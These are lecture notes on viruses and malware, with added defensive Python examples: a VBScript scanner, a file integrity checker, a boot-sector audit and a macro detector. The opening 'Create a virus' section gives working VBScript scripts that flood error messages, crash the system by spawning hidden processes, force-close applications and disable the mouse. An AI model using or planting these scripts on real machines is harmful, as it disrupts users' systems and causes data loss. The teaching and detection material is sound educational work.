15 Viruses and Malware
Hiteishi Diwanji
Create a virus:
1) Open Notepad, type the following and save it as fakemsg.vbs:

    do
    msgbox "System Error : 423"
    loop

- This script displays a message box with the message "System Error : 432".
- The message box is invoked again and again each time it is closed.
- To run a VBS script: go to Start -> Run -> type the full path with the script name.
To stop the script:
- To stop a script running under WScript, you need to stop the process in Windows Task Manager.
- Open Task Manager (right-click the taskbar and select Task Manager, or type taskmgr in the Run dialog box).
- On the Processes tab, select wscript.exe and press End Process.
Check for wscript.exe in the process list:
2) Crash system: open Notepad, type the following and save it as crashsystem.vbs:

    set ws=CreateObject("wscript.shell")
    do
    ws.run "notepad",0
    loop

- This program opens Notepad in hidden mode without end, overloading system memory until the system crashes.
- The value "0" in the third line specifies the mode in which the application should run; here it is hidden mode.
3) Close applications automatically within 5 seconds: open Notepad, type the following and save it as autoclose.vbs:

    set ws=CreateObject("wscript.shell")
    do
    ws.sendkeys "%{F4}"
    wscript.sleep 5000
    loop

- This script automatically closes any open application within 5 seconds.
- Specify a larger time value by changing the line "wscript.sleep 5000".
- To close within 15 seconds, change the value from "5000" to "15000".
4) Disable the mouse: open Notepad, type the following and save it as disablemouse.vbs:

    set ws=Createobject("wscript.shell")
    for i=1 to 4
    ws.run "WISPTIS.EXE",0
    next

- This script temporarily disables the mouse functionality.

Why worry about malicious code?
- Malicious code behaves in unexpected ways.
- Malicious code can write a message on the computer screen, stop a running program, generate a sound, or erase a stored file.
- Malicious code can also do nothing: planted, it lies dormant and undetected until some event triggers it to act. The trigger can be a time or date, an event, a condition, a count, or a combination of these.
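The four scripts in the "Create a virus" section share a small set of constructs: an unconditional do/loop with no exit, a message box or a hidden-window `Run` inside that loop, and `SendKeys`. The following static triage script, written for this page as an added example and not part of the lecture, scans VBScript text for exactly those constructs and reports findings per file. The sample scripts in `SAMPLES` are constructed here; the first two mirror the fakemsg.vbs and autoclose.vbs listings above, the third is a benign script used as a control.

```python
import re

# Constructed sample scripts (written for this example): the first two mirror the
# fakemsg.vbs / autoclose.vbs listings in the lecture, the third is benign.
SAMPLES = {
    "fakemsg.vbs": 'do\nmsgbox "System Error : 423"\nloop\n',
    "autoclose.vbs": ('set ws=CreateObject("wscript.shell")\ndo\n'
                      'ws.sendkeys "%{F4}"\nwscript.sleep 5000\nloop\n'),
    "report.vbs": ('set fso=CreateObject("Scripting.FileSystemObject")\n'
                   'for i=1 to 3\nwscript.echo i\nnext\n'),
}

# A bare "do" line followed later by a bare "loop" line: no loop condition at all.
# VBScript is case-insensitive, so every pattern is compiled with re.I.
INFINITE_LOOP = re.compile(r"^\s*do\s*$(?P<body>.*?)^\s*loop\s*$", re.I | re.M | re.S)
INDICATORS = {
    "msgbox":     re.compile(r"\bmsgbox\b", re.I),
    "hidden-run": re.compile(r"\.run\s+[^,\n]+,\s*0\b", re.I),   # WshShell.Run "...", 0
    "sendkeys":   re.compile(r"\.sendkeys\b", re.I),
}


def analyse(script: str) -> list[str]:
    """Return the list of finding names for one VBScript source text."""
    findings = []
    for m in INFINITE_LOOP.finditer(script):
        body = m.group("body")
        if re.search(r"\bexit\s+do\b", body, re.I):
            continue                                  # loop has an exit path
        findings.append("infinite-loop")
        if INDICATORS["msgbox"].search(body):
            findings.append("msgbox-flood")           # fakemsg.vbs pattern
        if INDICATORS["hidden-run"].search(body):
            findings.append("process-flood")          # crashsystem.vbs pattern
        if INDICATORS["sendkeys"].search(body):
            findings.append("keystroke-loop")         # autoclose.vbs pattern
    # Hidden-window launches and SendKeys are worth a flag even outside a loop
    # (disablemouse.vbs launches WISPTIS.EXE hidden from a bounded for/next).
    if INDICATORS["hidden-run"].search(script) and "process-flood" not in findings:
        findings.append("hidden-window-launch")
    if INDICATORS["sendkeys"].search(script) and "keystroke-loop" not in findings:
        findings.append("sendkeys")
    return findings


def triage(samples: dict[str, str]) -> dict[str, list[str]]:
    """Run analyse() over a name -> source mapping, e.g. a directory of .vbs files."""
    return {name: analyse(src) for name, src in samples.items()}


if __name__ == "__main__":
    for name, hits in triage(SAMPLES).items():
        print(f"{name:15s} {'SUSPICIOUS' if hits else 'clean':10s} {hits}")
```

This is a coarse heuristic, not an antivirus engine: a loop written as `do while true` or a `Run` call built from string concatenation would slip past it, which is why the operational control stays the one the lecture gives (end the wscript.exe process) together with restricting who may run Windows Script Host at all.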
Kinds of malicious code:
- Malicious code, or a rogue program, is the general name for unanticipated or undesired effects in programs or program parts, caused by an agent intent on damage.
- The agent is the writer of the program or the person who causes its distribution.
Virus:
- A virus is a program that can replicate itself and pass on malicious code to other non-malicious programs by modifying them.
| Transient virus | Resident virus |
| --- | --- |
| A transient virus has a life that depends on the life of its host; the virus runs when its attached program executes and terminates when its attached program ends. | A resident virus locates itself in memory; it can then remain active or be activated as a stand-alone program, even after its attached program ends. |
Trojan horse:
- Gets installed automatically along with an infected legitimate program.
- Once installed on the target machine, it can perform various malicious operations such as deleting files, transmitting files to the intruder, modifying files, installing other programs that provide unauthorized access, and executing privilege elevation attacks.
Other kinds of malicious code:
- Logic bomb: a class of malicious code that runs when a specified condition occurs.
- Time bomb: a logic bomb whose trigger is a time or date.
- Trapdoor or backdoor: a feature through which someone can access the program with special privileges. For example, the number 990099 in an automated bank teller program might allow the log of everyone's transactions at the machine to be processed.
- Worm: a program that spreads copies of itself through a network.
- Rabbit: a virus or worm that self-replicates without bound, trying to exhaust resources. A rabbit might create copies of itself and store them on the disk until the disk is completely full.
Difference between a virus and a worm:
- A worm operates through networks, whereas a virus can spread through any medium.
- A worm spreads copies of itself as a stand-alone program; a virus spreads copies of itself as a program that attaches to or embeds in other programs.
How viruses attach:
- The virus may be on a CD; when executed, the virus copies itself to permanent storage.
- The virus is attached to an e-mail. The virus writer convinces the victim to open the attachment.
- Appended viruses: a virus program attaches itself to a program; whenever the program is run, the virus is activated.
- Viruses that surround a program: the virus is attached to the original program but has control both before and after its execution. The virus writer wants to prevent the virus from being detected. If the virus is stored on disk, the filename or its size may help in detection, so the virus writer attaches the virus to the program that constructs the listing of files on disk. If the virus regains control after the listing program has generated the list but before the listing is displayed or printed, the virus can eliminate its own entry from the listing.
- Integrated viruses and replacements: the virus replaces some of the target and integrates itself into the original code of the target.
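The three attachment styles above change the host program in ways that a directory listing can be made to hide but a stored fingerprint cannot. The following integrity checker is an added example written for this page, not code from the lecture: it records size and SHA-256 of each program while the system is known clean, then compares the current files against that baseline. The host program and virus body are constructed byte strings, not real executables; `appended`, `surrounding` and `integrated` simulate the three attachment styles so the checker has something to catch.

```python
import hashlib


def fingerprint(data: bytes) -> tuple[int, str]:
    """Size plus SHA-256 digest: the two properties that reveal a modified host."""
    return len(data), hashlib.sha256(data).hexdigest()


# Constructed stand-ins (not real executables): a clean host program and a virus body.
HOST = b"HOST-PROGRAM:" + bytes(range(256)) * 4        # 1037 bytes
VIRUS = b"VIRAL-CODE" * 20                             # 200 bytes


def appended(host: bytes, virus: bytes) -> bytes:
    """Appended virus: virus code follows the host, so the file grows."""
    return host + virus


def surrounding(host: bytes, virus: bytes) -> bytes:
    """Surrounding virus: virus code runs before and after the host."""
    return virus + host + virus


def integrated(host: bytes, virus: bytes) -> bytes:
    """Integrated/replacement virus: overwrites part of the target; size is unchanged."""
    return host[:64] + virus + host[64 + len(virus):]


def check(baseline: dict[str, tuple[int, str]], current: dict[str, bytes]) -> dict[str, str]:
    """Compare current file contents against the clean baseline, file by file."""
    verdicts = {}
    for name, (size0, digest0) in baseline.items():
        if name not in current:
            verdicts[name] = "missing"
            continue
        size1, digest1 = fingerprint(current[name])
        if digest1 == digest0:
            verdicts[name] = "ok"
        elif size1 != size0:
            verdicts[name] = "modified (size changed)"
        else:
            verdicts[name] = "modified (same size)"     # size alone would miss this
    return verdicts


def demo() -> dict[str, str]:
    """Baseline four identical clean programs, then infect three of them differently."""
    baseline = {f"prog{i}.exe": fingerprint(HOST) for i in range(4)}
    current = {
        "prog0.exe": HOST,
        "prog1.exe": appended(HOST, VIRUS),
        "prog2.exe": surrounding(HOST, VIRUS),
        "prog3.exe": integrated(HOST, VIRUS),
    }
    return check(baseline, current)


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name}: {verdict}")
```

The baseline must be taken from a known-clean system and kept where the checked machine cannot alter it; a virus that can regain control between the listing program and its output, as described above, can just as well doctor a baseline file it can reach. Note also that the integrated variant keeps the original size, which is why the digest, not the size, is the deciding comparison.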
Document viruses:
- Implemented within a formatted document, such as a written document, a database, a slide presentation, a picture, or a spreadsheet.
- These documents are highly structured files that contain both data and commands (included in macros, variables, procedures, file accesses, and system calls).
- The virus writer can use any feature of the document to perform malicious actions.
How viruses gain control:
- The virus (V) is to be invoked instead of the target (T).
Homes for viruses:
The virus writer may find these qualities appealing in a virus:
• It is hard to detect.
• It is not easily destroyed or deactivated.
• It spreads infection widely.
• It can reinfect its home program or other programs.
• It is easy to create.
• It is machine independent and operating system independent.
How viruses gain control:
- Many viruses are transmitted by e-mail, using either of two routes.
- In the first case, some virus writers generate a new e-mail message to all addresses in the victim's address book. These new messages contain a copy of the virus so that it propagates widely.
- The first recipient opens the attachment because it appears to come from a friend; for example, the subject line or message body may read "I thought you might enjoy this picture from our vacation."
- In the second case, the virus writer can leave the infected file for the victim to forward unknowingly. If the virus's effect is not immediately obvious, the victim may pass the infected file unwittingly to other victims.
Viral residence – One-Time Execution:
- The majority of viruses today execute only once, spreading their infection and causing their effect in that one execution.
- A virus often arrives as an e-mail attachment of a document virus. It is executed just by being opened.
Viral residence – Boot Sector Viruses:
- When a computer starts, control begins with firmware that determines which hardware components are present, tests them, and transfers control to an operating system.
- After the hardware test, the operating system is invoked dynamically, perhaps even by the user's choice.
- The operating system is software stored on disk. The bootstrap (often "boot") load copies the operating system from disk to memory and transfers control to it; the name comes from the operating system figuratively pulling itself into memory by its bootstraps.
- The firmware does its control transfer by reading a fixed number of bytes from a fixed location on the disk, called the boot sector, to a fixed address in memory and then jumping to that address (which will turn out to contain the first instruction of the bootstrap loader).
- The bootstrap loader then reads the rest of the operating system into memory from disk.
- To run a different operating system, the user just inserts a disk with the new operating system and a bootstrap loader.
- When the user reboots from this new disk, the loader there brings in and runs the other operating system. This same scheme is used for personal computers, workstations, and large mainframes.
- A boot sector virus gains control very early in the boot process, before most detection tools are active.
- The virus can therefore avoid, or at least complicate, detection.
- The files in the boot area are crucial parts of the operating system. To keep users from accidentally modifying or deleting them, with disastrous results, the operating system makes them "invisible" by not showing them in a normal listing of stored files and by preventing their deletion.
- The virus code is therefore not readily noticed by users.
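Because the firmware reads a fixed number of bytes from a fixed location, the boot sector has a fixed layout that can be checked from outside the running system (for example from a clean boot medium). The following parser and audit routine is an added example written for this page, not lecture code: it assumes the classic 512-byte MBR layout (446 bytes of bootstrap code, four 16-byte partition entries, the 0x55AA signature), hashes the code area against a baseline taken from a known-clean boot, and sanity-checks the partition table. The sector contents are constructed here; the "bootstrap code" is a labelled placeholder string, not real loader code.

```python
import hashlib
import struct

SECTOR_SIZE = 512
CODE_LEN = 446                      # bootstrap code area of an MBR-style sector
PART_FMT = "<B3sB3sII"              # status, CHS start, type, CHS end, LBA start, sector count
SIGNATURE = b"\x55\xAA"             # boot signature at offsets 510-511


def build_sector(code: bytes, partitions: list[tuple]) -> bytes:
    """Assemble a 512-byte boot sector from a code blob and up to four partition entries."""
    if len(code) > CODE_LEN or len(partitions) > 4:
        raise ValueError("code or partition table too large")
    table = b"".join(struct.pack(PART_FMT, *p) for p in partitions).ljust(64, b"\0")
    return code.ljust(CODE_LEN, b"\0") + table + SIGNATURE


def parse_sector(sector: bytes) -> dict:
    """Split a sector into a code-area hash, the used partition entries and a signature check."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("boot sector must be exactly 512 bytes")
    entries = []
    for i in range(4):
        raw = sector[CODE_LEN + 16 * i: CODE_LEN + 16 * (i + 1)]
        status, _, ptype, _, lba, count = struct.unpack(PART_FMT, raw)
        if ptype:                                   # partition type 0 means an unused slot
            entries.append({"status": status, "type": ptype, "lba": lba, "sectors": count})
    return {
        "signature_ok": sector[510:512] == SIGNATURE,
        "code_sha256": hashlib.sha256(sector[:CODE_LEN]).hexdigest(),
        "partitions": entries,
    }


def audit_sector(sector: bytes, baseline_code_sha256: str) -> list[str]:
    """Compare a sector with the baseline hash of its clean bootstrap code; list anomalies."""
    info = parse_sector(sector)
    issues = []
    if not info["signature_ok"]:
        issues.append("missing 0x55AA boot signature")
    if info["code_sha256"] != baseline_code_sha256:
        issues.append("bootstrap code changed since baseline")
    for p in info["partitions"]:
        if p["status"] not in (0x00, 0x80):          # only "inactive" and "bootable" are valid
            issues.append(f"invalid status byte 0x{p['status']:02x}")
    ordered = sorted(info["partitions"], key=lambda p: p["lba"])
    for a, b in zip(ordered, ordered[1:]):
        if a["lba"] + a["sectors"] > b["lba"]:
            issues.append("overlapping partition entries")
    return issues


# Constructed sample data: these strings stand in for real bootstrap code.
CLEAN_CODE = b"\xEB\x3C\x90" + b"constructed clean bootstrap loader (not real code)"
INFECTED_CODE = b"\xEB\x3C\x90" + b"constructed replaced loader simulating a boot sector virus"
PARTITIONS = [(0x80, b"\0\0\0", 0x07, b"\0\0\0", 2048, 204800)]

CLEAN_SECTOR = build_sector(CLEAN_CODE, PARTITIONS)
INFECTED_SECTOR = build_sector(INFECTED_CODE, PARTITIONS)
BASELINE = parse_sector(CLEAN_SECTOR)["code_sha256"]   # recorded after a known-clean boot

if __name__ == "__main__":
    print("clean   :", audit_sector(CLEAN_SECTOR, BASELINE) or "no issues")
    print("infected:", audit_sector(INFECTED_SECTOR, BASELINE) or "no issues")
```

The check is only trustworthy when the sector is read by code that the suspected virus did not load first; reading it from inside an operating system booted through an infected sector may return whatever the resident virus chooses to show, which is the same "invisible files" problem the lecture describes.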
Viral residence – Memory-Resident Viruses:
- For very frequently used parts of the operating system, and for a few specialized user programs, code remains in memory and is called "resident" code.
- Examples of resident code are the routine that interprets keys pressed on the keyboard, the code that handles error conditions that arise during a program's execution, or a program that acts like an alarm clock, sounding a signal at a time the user determines.
- Resident routines are sometimes called TSRs, or "terminate and stay resident" routines.
- Virus writers also like to attach viruses to resident code because the resident code is activated many times while the machine is running.
- Each time the resident code runs, the virus does too. Once activated, the virus can look for and infect uninfected carriers.
- For example, after activation, a boot sector virus might attach itself to a piece of resident code. Then, each time the virus was activated, it might check whether any removable disk in a disk drive was infected and, if not, infect it.
Other Homes for Viruses:
- One popular home for a virus is an application program. Many applications, such as word processors and spreadsheets, have a "macro" feature, by which a user can record a series of commands and repeat them with one invocation. Such programs also provide a "startup macro" that is executed every time the application is started.
- A virus writer can create a virus macro that adds itself to the startup directives for the application. It then also embeds a copy of itself in data files so that the infection spreads to anyone receiving one or more of those files.
- Libraries are used by many programs, so malicious code residing there has a broad effect.
- Libraries are shared among users and transmitted from one user to another, a practice that spreads the infection.
- Finally, executing code in a library can pass on the viral infection to other transmission media.
- Compilers, loaders, linkers, runtime monitors, runtime debuggers, and even virus control programs are good candidates for hosting viruses because they are widely shared.
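Both the "Document viruses" section and the application-macro home described above come down to the same fact: a document file carries commands as well as data. For the Office Open XML formats (.docx/.docm and their spreadsheet and presentation siblings) those commands live in a `vbaProject.bin` part inside the ZIP container, and the package's `[Content_Types].xml` declares it. The following checker is an added example written for this page, not lecture code: it opens a document as a ZIP archive, looks for a VBA project part and for macro-enabled content types, and returns a verdict, without ever executing anything from the file. The sample documents are constructed in memory here and are minimal (Word would not open them), but their package structure is representative.

```python
import io
import zipfile

# Part names and content-type markers that indicate an embedded VBA project.
MACRO_PARTS = ("word/vbaProject.bin", "xl/vbaProject.bin", "ppt/vbaProject.bin")
MACRO_CONTENT_TYPES = ("macroEnabled", "application/vnd.ms-office.vbaProject")
CONTENT_TYPES_PART = "[Content_Types].xml"


def build_document(parts: dict[str, bytes]) -> bytes:
    """Pack a name -> bytes mapping into an in-memory ZIP, the container OOXML uses."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, data in parts.items():
            z.writestr(name, data)
    return buf.getvalue()


def inspect(document: bytes) -> dict:
    """Report whether the bytes are an OOXML package and whether it carries macros."""
    try:
        z = zipfile.ZipFile(io.BytesIO(document))
    except zipfile.BadZipFile:
        return {"ooxml": False, "macros": [], "content_type_flag": False}
    names = z.namelist()
    macros = [n for n in names if n in MACRO_PARTS or n.lower().endswith("vbaproject.bin")]
    ctypes = ""
    if CONTENT_TYPES_PART in names:
        ctypes = z.read(CONTENT_TYPES_PART).decode("utf-8", errors="replace")
    return {
        "ooxml": CONTENT_TYPES_PART in names,
        "macros": macros,
        "content_type_flag": any(marker in ctypes for marker in MACRO_CONTENT_TYPES),
    }


def verdict(document: bytes) -> str:
    """Turn inspect() output into a one-line triage decision."""
    info = inspect(document)
    if not info["ooxml"]:
        return "not an Office Open XML package"
    if info["macros"] or info["content_type_flag"]:
        return "contains macros: quarantine or strip before opening"
    return "no macro payload found"


# Constructed sample documents (minimal package skeletons written for this example).
CLEAN_DOCX = build_document({
    CONTENT_TYPES_PART: (b'<Types><Override PartName="/word/document.xml" ContentType='
                         b'"application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/></Types>'),
    "word/document.xml": b"<w:document/>",
})
MACRO_DOCM = build_document({
    CONTENT_TYPES_PART: (b'<Types><Override PartName="/word/document.xml" ContentType='
                         b'"application/vnd.ms-word.document.macroEnabled.main+xml"/>'
                         b'<Override PartName="/word/vbaProject.bin" ContentType='
                         b'"application/vnd.ms-office.vbaProject"/></Types>'),
    "word/document.xml": b"<w:document/>",
    # Placeholder bytes standing in for a compiled VBA project, not a real one.
    "word/vbaProject.bin": b"\xd0\xcf\x11\xe0constructed placeholder for a VBA project",
})

if __name__ == "__main__":
    print("clean.docx :", verdict(CLEAN_DOCX))
    print("macro.docm :", verdict(MACRO_DOCM))
```

The checker deliberately ignores the file extension: the package contents, not the name, decide, so renaming a macro-enabled file does not change the verdict. Where a mail gateway or endpoint agent applies this kind of check, the lecture's two e-mail propagation routes are cut off before the "open the attachment" step.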
Suggested Reading:
- Cryptography and Network Security: Principles and Practice by William Stallings, sixth edition, Pearson.
- Security in Computing by Charles Pfleeger & Shari Lawrence Pfleeger, fourth edition, Pearson.
- Network Security by Charlie Kaufman, Radia Perlman & Mike Speciner, second edition, PHI.
- The Complete Reference: Network Security by Roberta Bragg, Mark Rhodes-Ousley & Keith Strassberg, Tata McGraw Hill.
- Network Security Bible by Eric Cole, Ronald Krutz & James Conley, Wiley.
- Hacking Exposed, sixth edition, by Stuart McClure, Joel Scambray & George Kurtz, Tata McGraw Hill.
- www.snort.org
- https://nmap.org